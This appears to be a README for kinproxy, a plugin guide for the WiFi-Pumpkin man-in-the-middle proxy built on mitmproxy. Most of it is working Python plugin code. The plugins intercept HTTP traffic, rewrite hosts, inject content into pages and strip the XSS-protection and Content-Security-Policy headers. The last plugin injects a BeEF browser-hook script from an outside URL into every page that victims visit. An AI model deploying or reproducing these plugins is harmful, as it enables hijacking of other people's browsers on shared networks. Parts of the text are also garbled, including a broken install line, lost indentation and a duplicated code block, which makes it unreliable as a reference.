Awesome
kinproxy
my implements transparent proxies (mitmproxy) can use to intercept and manipulate HTTP traffic modifying requests and responses.
Instalation
$ sudo apt-get update
$ sudo apt-get install -y python-pip libffi-dev
$ libssl-dev libxml2-dev libxslt1-dev zlib1g-dev
$ sudo apt-get install -y python-qt4
$ sudo apt-get install -y python-dev git
$ sudo apt-get install -y libpcap-dev
$ sudo pip install -r requirements.txt
$ sudo pip install mitmproxy==0.18.2
Transparent proxies(mitmproxy) that you can use to intercept and manipulate HTTP traffic modifying requests and responses, that allow to inject javascripts into the targets visited. You can easily implement a module to inject data into pages creating a python file in directory "plugins/" automatically will be loaded.
Plugins Example Dev
from mitmproxy.models import decoded # for decode content html
from plugins.extension.plugin import PluginTemplate
class Nameplugin(PluginTemplate):
meta = {
'Name' : 'Nameplugin',
'Version' : '1.0',
'Description' : 'Brief description of the new plugin',
'Author' : 'by dev'
}
def __init__(self):
for key,value in self.meta.items():
self.__dict__[key] = value
# if you want set arguments check refer wiki more info.
self.ConfigParser = False # No require arguments
def request(self, flow):
print flow.__dict__
print flow.request.__dict__
print flow.request.headers.__dict__ # request headers
host = flow.request.pretty_host # get domain on the fly requests
versionH = flow.request.http_version # get http version
# get redirect domains example
# pretty_host takes the "Host" header of the request into account,
if flow.request.pretty_host == "example.org":
flow.request.host = "mitmproxy.org"
# get all request Header example
self.send_output.emit("\n[{}][HTTP REQUEST HEADERS]".format(self.Name))
for name, valur in flow.request.headers.iteritems():
self.send_output.emit('{}: {}'.format(name,valur))
print flow.request.method # show method request
# the model printer data
self.send_output.emit('[NamePlugin]:: this is model for save data logging')
def response(self, flow):
print flow.__dict__
print flow.response.__dict__
print flow.response.headers.__dict__ #convert headers for python dict
print flow.response.headers['Content-Type'] # get content type
#every HTTP response before it is returned to the client
with decoded(flow.response):
print flow.response.content # content html
flow.response.content.replace('</body>','<h1>injected</h1></body>') # replace content tag
del flow.response.headers["X-XSS-Protection"] # remove protection Header
flow.response.headers["newheader"] = "foo" # adds a new header
#and the new header will be added to all responses passing through the proxy
Overview
First of all write the import plugin tamplate
from plugins.extension.plugin import PluginTemplate
the basic plugin example:
from plugins.extension.plugin import PluginTemplate
class Example(PluginTemplate):
meta = {
'Name' : 'exampleplugin',
'Version' : '1.0',
'Description' : 'description of plugin',
'Author' : 'by dev Name',
}
def __init__(self):
for key,value in self.meta.items():
self.__dict__[key] = value
self.ConfigParser = False # requeire args
def request(self, flow): # get all request HTTP traffic
pass
def response(self, flow): # get all response HTTP traffic
pass
Modify Packets
Simple fuctions that just adds a header to every request..
def response(self, flow):
flow.response.headers["newheader"] = "foo" # adds a new header
example from mitmproxy how to redirect connections (IP spoofing)
def request(self, flow):
if flow.client_conn.ssl_established:
flow.request.scheme = "https"
sni = flow.client_conn.connection.get_servername()
port = 443
else:
flow.request.scheme = "http"
sni = None
port = 80
host_header = flow.request.pretty_host
m = parse_host_header.match(host_header)
if m:
host_header = m.group("host").strip("[]")
if m.group("port"):
port = int(m.group("port"))
flow.request.host = sni or host_header
flow.request.port = port
another example how to rewrite packet in real time
from mitmproxy.models import decoded # for decode content html
from plugins.extension.plugin import PluginTemplate
class Nameplugin(PluginTemplate):
meta = {
'Name' : 'Nameplugin',
'Version' : '1.0',
'Description' : 'Brief description of the new plugin',
'Author' : 'by dev'
}
def __init__(self):
for key,value in self.meta.items():
self.__dict__[key] = value
# if you want set arguments check refer wiki more info.
self.ConfigParser = False # No require arguments
def request(self, flow):
print flow.__dict__
print flow.request.__dict__
print flow.request.headers.__dict__ # request headers
host = flow.request.pretty_host # get domain on the fly requests
versionH = flow.request.http_version # get http version
# get redirect domains example
# pretty_host takes the "Host" header of the request into account,
if flow.request.pretty_host == "example.org":
flow.request.host = "mitmproxy.org"
# get all request Header example
self.send_output.emit("\n[{}][HTTP REQUEST HEADERS]".format(self.Name))
for name, valur in flow.request.headers.iteritems():
self.send_output.emit('{}: {}'.format(name,valur))
print flow.request.method # show method request
# the model printer data
self.send_output.emit('[NamePlugin]:: this is model for save data logging')
def response(self, flow):
print flow.__dict__
print flow.response.__dict__
print flow.response.headers.__dict__ #convert headers for python dict
print flow.response.headers['Content-Type'] # get content type
#every HTTP response before it is returned to the client
with decoded(flow.response):
print flow.response.content # content html
flow.response.content.replace('</body>','<h1>injected</h1></body>') # replace content tag
del flow.response.headers["X-XSS-Protection"] # remove protection Header
flow.response.headers["newheader"] = "foo" # adds a new header
#and the new header will be added to all responses passing through the proxy
Logging
if you want to save data(pumpkin-prxoy.log) in your plugin, just use self.send_output.emit('msg here')
def request(self, flow):
self.send_output.emit('[example]:: this is hellow WiFi-Pumpkin')
How to add argumments
Now, if you want to add argumments in proxy.ini, you need to add in directory "core/pumpkinProxy.ini" the key (exampleplugin and set_exampleplugin).
- exampleplugin key is the option checkbox to change and enable or disable plugin
- set_exampleplugin this is key for search all argumments in Settings option.
Example from WiFi-Pumpkin with Argummets
class beef(PluginTemplate):
meta = {
'Name' : 'beef',
'Version' : '1.0',
'Description' : 'this module proxy inject hook beef api url.[Hook URL]',
'Author' : 'Marcos Nesster'
}
def __init__(self):
for key,value in self.meta.items():
self.__dict__[key] = value
self.ConfigParser = True
self.urlhook = self.config.get_setting('set_beef','hook')
def request(self, flow):
pass
def response(self,flow):
with decoded(flow.response): # Remove content encoding (gzip, ...)
html = BeautifulSoup(flow.response.content)
"""
# To Allow CORS
if "Content-Security-Policy" in flow.response.headers:
del flow.response.headers["Content-Security-Policy"]
"""
if html.body:
script = html.new_tag(
'script',
src=self.urlhook)
html.body.insert(0, script)
flow.response.content = str(html)
self.send_output.emit("[{}] Injected BeFF url hook...".format(self.Name))